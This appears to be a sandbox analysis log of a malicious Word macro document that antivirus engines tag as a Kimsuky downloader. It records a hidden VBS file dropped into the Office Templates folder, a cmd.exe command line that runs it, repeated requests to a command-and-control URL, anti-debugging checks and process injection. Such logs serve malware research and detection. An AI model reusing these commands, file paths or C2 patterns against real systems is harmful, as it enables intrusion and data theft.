filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$bfba0b98c135481c14db1c2f2da484.docm
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x0000062c
filepath: C:\Users\test22\AppData\Roaming\Microsoft\Templates\~$ersion.vbs
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Roaming\Microsoft\Templates\~$ersion.vbs
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\version.vbs.LNK
file C:\Users\test22\AppData\Roaming\Microsoft\Office\Recent\Templates.LNK
cmdline cmd.exe /c C:\Users\test22\AppData\Roaming\Microsoft\Templates\version.vbs
cmdline "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Roaming\Microsoft\Templates\version.vbs
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c C:\Users\test22\AppData\Roaming\Microsoft\Templates\version.vbs
filepath: cmd.exe
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: http://koreaillmin.mypressonline.com/file/upload/list.php?query=1
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /file/upload/list.php?query=1
1 13369356 0

InternetReadFile

buffer: <html> <head> <title>Free Web Hosting, Domain Hosting, Reliable Web Hosting Provider, Domain registration, Inexpensive, Low Cost, Affordable, Reseller Program, PHP, MySQL, Linux, Ecommerce</title> <meta name="Description" content="Affordable, reliable web hosting and domain registration provider: low cost, inexpensive plans, reseller program, complete e-commerce solutions, instant customer support, PHP, MySQL, Linux, Perl, CGI."> <meta name="Keywords" content="web,hosting,free,site,affordable,inexpensive,cheap,domain,name,registration,register,reseller,program,ftp,php,sql,mysql,database,cgi,perl,lamp,asp,ms,frontpage,server,net,ecommerce,services,business,email,page,unix,linux,company,virtual,internet,secure,registrar,the,best,low,cost,discount,e,commerce,solution,personal,professional,no ads,Support,cpanel,subdomains,dns,com,webpage,website,homepag
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: e,managed,zettahost,plans,file,jsp,unlimited,software,comparison,exchange,high,ratings,application,dollar,forum,board,blog,weblog,log,java,servlet,cam,list,packages,media,control,panel,prices,cheapest,for sale,isp,multimedia,resell,url,biz,registering,expired,tld,build,dynamic,who,own,domein,doman,icann,top,level,no ad,bannerless,urls,addresses,feature,domainname,reselling,nick,tlds,registrants,public,the,registry,buy,find,forwarding,trust,purchase,qualified,pro,get,renew,back,order,bulk,transfer,budget,design,sites,companies,plan,highest,rating,search,whois,registrations,partner,affiliate,Access,Data,Transfer,Disk,Space,POP3,mail,SMTP,Autoresponder,Aliasing,forward,Apache,phpMyAdmin,ssi,Side,Includes,Extensions,Online,statistics,24,7,fee,offer,org,biz,info,us,help,whois,trial,multiple,parking,check,top,ssl,options,bandwidth,band,GB,MB,Setup,Toll,HDD,industry,quality,lookup,uptime,Superb technical support and outstanding staff service,usa,new,ensim,plesk,shared,review,cold,fusion,image,video,music,photo,game,mp3,small,most,webcam,e-business"> <meta name="abstract" content="Web Hosting Services, Domain Name Registration, High Quality, Inexpensive Plans, Low Cost, Affordable, Reliable Provider, Reseller Program, Complete Ecommerce Solutions, Best Customer Support, PHP, MySQL, Linux, CGI, Perl, LAMP"> <meta name="Author" content="Web Hosting, Domain Name Registration, Inexpensive, Low Cost, Affordable, Reliable Provider, Reseller Program, PHP, MySQL, Linux, Ecommerce"> <meta name="Distribution" content="Global"> <meta name="Revisit" content="2 days"> <meta name="Language" content="EN"> <meta name="Robots" content="all"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- .text {font-family: Arial, Helvetica, sans-serif; font-size: 12px; font-weight: bold; color: #0080C0} .text_black {font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #000000} .header_table {background: #0080C0; font-family: Arial, Helvetica, sans-serif; font-size: 18px; color: #FFFFFF} img {border: 0px} .copyright {font-family: Arial, Helvetica, sans-serif; font-size: 11px; font-weight: normal; color: #666666} --> </style> <script type="text/javascript"> <!-- if (self != top) { top.location = self.location; } // --> </script> </head> <body bgcolor="#FFFFFF" marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0"> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="top"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td> <table width="100%" cellpadding="0" cellspacing="1" border="0" class="header_table"> <tr> <td bgcolor="#FF0000" align="center"><img src="/4082ec47_hosting_expired_account.jpg" width="187" height="20"></td> </tr> </table> </td> </tr> </table> <table width="100%" border="0" cellspacing="0" cellpadding="15" style="margin-top: 10px"> <tr> <td class="text">Notice: The website http://koreaillmin.mypressonline.com has expired.</td> </tr> <tr>
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: <td class="text_black"> <b>Description:</b> This web site has expired.<br> <br> To view this website again you have the following options:<br> <br> <div style="padding-left: 15px">&#149; <b>You are the owner of the hosting account?</b> <div style="padding-left: 30px"> You can login your Hosting Control Panel and renew your account via the Account Renewal section. </div><br> &#149; <b>You are a visitor?</b> <div style="padding-left: 30px"> You can come back and visit this website at a later time or inform the web site owner about the problem. </div><br> </div><br> </td> </tr> </table> </td> <tr> </table> </body> </html>
request_handle: 0x00cc000c
1 1 0
parent_process winword.exe martian_process cmd.exe /c C:\Users\test22\AppData\Roaming\Microsoft\Templates\version.vbs
Time & API Arguments Status Return Repeated

InternetCrackUrlW

url: http://koreaillmin.mypressonline.com/file/upload/list.php?query=1
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 4194304
http_method: GET
referer:
path: /file/upload/list.php?query=1
1 13369356 0

send

buffer: !
socket: 820
sent: 1
1 1 0

send

buffer: GET /file/upload/list.php?query=1 HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MARKANYEPS#25118) Host: koreaillmin.mypressonline.com Connection: Keep-Alive
socket: 924
sent: 353
1 353 0

send

buffer: !
socket: 820
sent: 1
1 1 0
parent_process winword.exe martian_process cmd.exe /c C:\Users\test22\AppData\Roaming\Microsoft\Templates\version.vbs
parent_process winword.exe martian_process "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Roaming\Microsoft\Templates\version.vbs
Process injection Process 296 resumed a thread in remote process 2432
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000002c4
suspend_count: 1
process_identifier: 2432
1 0 0
Elastic malicious (high confidence)
Cynet Malicious (score: 99)
ALYac GT:VB.EmoooDldr.4.B03C1B6E
VIPRE GT:VB.EmoooDldr.4.B03C1B6E
Sangfor Malware.Generic-Macro.Save.a893fb17
BitDefender GT:VB.EmoooDldr.4.B03C1B6E
Arcabit HEUR.VBA.CG.2
ESET-NOD32 VBA/Kimsuky.K
Avast VBS:Obfuscated-gen [Trj]
ClamAV Doc.Downloader.Valyria-10021468-0
NANO-Antivirus Trojan.Script.Dnldr.elyanu
MicroWorld-eScan GT:VB.EmoooDldr.4.B03C1B6E
Emsisoft GT:VB.EmoooDldr.4.B03C1B6E (B)
F-Secure Heuristic.HEUR/Macro.Downloader.PBMD.Gen
DrWeb modification of W97M.Suspicious.1
TrendMicro HEUR_VBA.O2
FireEye GT:VB.EmoooDldr.4.B03C1B6E
Google Detected.Heuristic.Script
Avira HEUR/Macro.Downloader.PBMD.Gen
GData GT:VB.EmoooDldr.4.B03C1B6E
TACHYON Suspicious/WOX.XSR.Gen
MAX malware (ai score=82)
AVG VBS:Obfuscated-gen [Trj]
file C:\Windows\System32\cmd.exe
file C:\Windows\SysWOW64\wscript.exe